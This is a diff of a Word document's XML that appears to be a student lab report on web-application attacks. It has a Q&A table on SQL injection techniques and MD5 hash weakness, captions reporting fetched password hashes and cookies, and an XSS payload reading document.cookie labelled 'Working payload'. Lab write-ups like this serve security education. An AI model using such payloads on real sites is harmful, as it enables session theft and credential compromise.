+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="GridTable5Dark-Accent6"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4086"/>
+        <w:gridCol w:w="5264"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Question</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Answer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Why does High security change input location?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>To prevent URL-based injection; uses session-stored ID via popup</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Difference between -- and #?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Both are SQL comments; # is MySQL-specific and bypasses some filters</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t xml:space="preserve">What does </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>information_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> give?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Access to all DB metadata — tables, columns, data types</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>Why must column count be exact for UNION?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>UNION requires both SELECT statements to have identical column counts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>What hashing algorithm? Why weak?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+              <w:t>MD5 — no salt, fast to compute, easily rainbow-table cracked</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8694BD" wp14:editId="3FEE469B">
+            <wp:extent cx="2402484" cy="2579218"/>
+            <wp:effectExtent l="76200" t="76200" r="131445" b="126365"/>
+            <wp:docPr id="1171141619" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1171141619" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2415629" cy="2593330"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln w="38100" cap="sq">
+                      <a:solidFill>
+                        <a:srgbClr val="000000"/>
+                      </a:solidFill>
+                      <a:prstDash val="solid"/>
+                      <a:miter lim="800000"/>
+                    </a:ln>
+                    <a:effectLst>
+                      <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
+                        <a:srgbClr val="000000">
+                          <a:alpha val="43000"/>
+                        </a:srgbClr>
+                      </a:outerShdw>
+                    </a:effectLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+        </w:rPr>
+        <w:t>Password hash fetched of different users</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3069,6 +4350,7 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
         </w:pBdr>
         <w:spacing w:before="200" w:after="200"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -3080,6 +4362,7 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
         </w:pBdr>
         <w:spacing w:before="200" w:after="200"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -3091,11 +4374,688 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
         </w:pBdr>
         <w:spacing w:before="200" w:after="200"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47630014" wp14:editId="34F66887">
+            <wp:extent cx="5888106" cy="4096512"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1782815569" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1782815569" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5929776" cy="4125503"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
+        </w:pBdr>
+        <w:spacing w:before="200" w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Got document cookies.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
+        </w:pBdr>
+        <w:spacing w:before="200" w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=x </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>onerror</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
+        </w:pBdr>
+        <w:spacing w:before="200" w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Working payload,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
+        </w:pBdr>
+        <w:spacing w:before="200" w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E5090"/>
+        </w:pBdr>
+        <w:spacing w:before="200" w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="GridTable5Dark-Accent4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2761"/>
+        <w:gridCol w:w="6589"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-PK"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
